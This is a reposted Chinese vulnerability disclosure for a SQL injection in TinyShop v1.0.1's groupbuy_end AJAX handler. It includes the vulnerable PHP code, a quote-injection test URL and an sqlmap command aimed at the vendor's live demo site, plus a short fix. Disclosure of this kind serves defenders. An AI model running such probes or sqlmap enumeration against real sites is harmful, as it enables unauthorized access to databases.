未加星标

TinyShop v1.0.1 SQL注射 可致数据库信息泄露

字体大小 | |
[web安全 所属分类 web安全 | 发布者 店小二03 | 时间 20140721 | 作者 lxj616 ] 0人收藏点击收藏
TinyShop v1.0.1 SQL注射 可致数据库信息泄露(官网演示+源码分析)

无视gpc

详细说明:

/protected/controllers/ajax.php


//团购结束更新

public function groupbuy_end(){

$id = Req::args('id');

//取得id

if($id){

$item = $this->model->table("groupbuy")->where("id=$id")->find();

//无视GPC,直接带入查询

$end_diff = time()-strtotime($item['end_time']);

if($end_diff>0){

$this->model->table("groupbuy")->where("id=$id")->data(array('is_end'=>1))->update();

}

}


}



$id无单引号保护,因此无视GPC


何况官网没开GPC(框架里自动stripslashes先,开了也没用)


http://shop.tinyrise.com/ajax/groupbuy_end?id=4%27

TinyShop v1.0.1 SQL注射 可致数据库信息泄露

没有引号保护

SQLMAP

C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12



TinyShop v1.0.1 SQL注射 可致数据库信息泄露
TinyShop v1.0.1 SQL注射 可致数据库信息泄露
TinyShop v1.0.1 SQL注射 可致数据库信息泄露


都已经delay 12了 丢包还是惊人,不过还是跑出数据库名了

修复方案:

单引号保护+addslashes

本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师

代码区博客精选文章
分页:12
转载请注明
本文标题:TinyShop v1.0.1 SQL注射 可致数据库信息泄露
本站链接:https://www.codesec.net/view/443.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | web安全 | 评论(0) | 阅读(20)